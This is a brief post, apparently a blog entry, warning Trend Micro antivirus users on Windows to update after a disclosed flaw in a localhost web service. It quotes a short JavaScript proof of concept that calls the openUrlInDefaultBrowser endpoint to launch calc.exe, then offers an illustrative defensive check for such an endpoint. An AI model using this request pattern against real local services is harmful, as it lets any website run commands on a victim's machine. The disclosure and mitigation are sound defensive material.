If you're running Trend Micro's antivirus solution on Windows, update it asap!!


January 12, 2016

If you’re running Trend Micro’s antivirus solution on Windows, update it asap!!

A major security flaw was found in the software: it runs a web service on localhost that is very vulnerable to attack.

From the security post:

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};
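
One way a local helper service could gate an endpoint like openUrlInDefaultBrowser before anything reaches ShellExecute(), shown as an added example (not Trend Micro's code and not from the quoted post). The function names, the `x-local-token` header and the http/https allow-list are assumptions made for illustration.

```javascript
// Hypothetical policy: only web links may be handed to the OS "open" call.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Compare the supplied per-install secret without an early exit on mismatch.
function tokenMatches(supplied, expected) {
  const a = String(supplied || "");
  let diff = a.length ^ expected.length;
  for (let i = 0; i < expected.length; i++) {
    diff |= (a.charCodeAt(i) | 0) ^ expected.charCodeAt(i);
  }
  return diff === 0;
}

// Decide whether a request to the local "open URL" endpoint may proceed.
// headers: request headers with lower-cased names (assumed shape)
// rawUrl:  the value of the `url` query parameter
function checkOpenUrlRequest(headers, rawUrl, expectedToken) {
  // Browsers attach Origin to cross-origin XHR/fetch, and a web page is
  // never a legitimate caller of this local API.
  if (headers.origin !== undefined) {
    return { allow: false, reason: "cross-origin caller" };
  }
  // Origin is absent on some browser-initiated requests (e.g. image loads),
  // so a secret known only to the local client is still required.
  if (!tokenMatches(headers["x-local-token"], expectedToken)) {
    return { allow: false, reason: "missing or bad token" };
  }
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch (e) {
    return { allow: false, reason: "not an absolute URL" };
  }
  // "c:/windows/system32/calc.exe" parses as scheme "c:", so a drive path
  // is rejected here instead of being passed on to the shell.
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { allow: false, reason: "scheme not allowed: " + parsed.protocol };
  }
  return { allow: true, url: parsed.href };
}
```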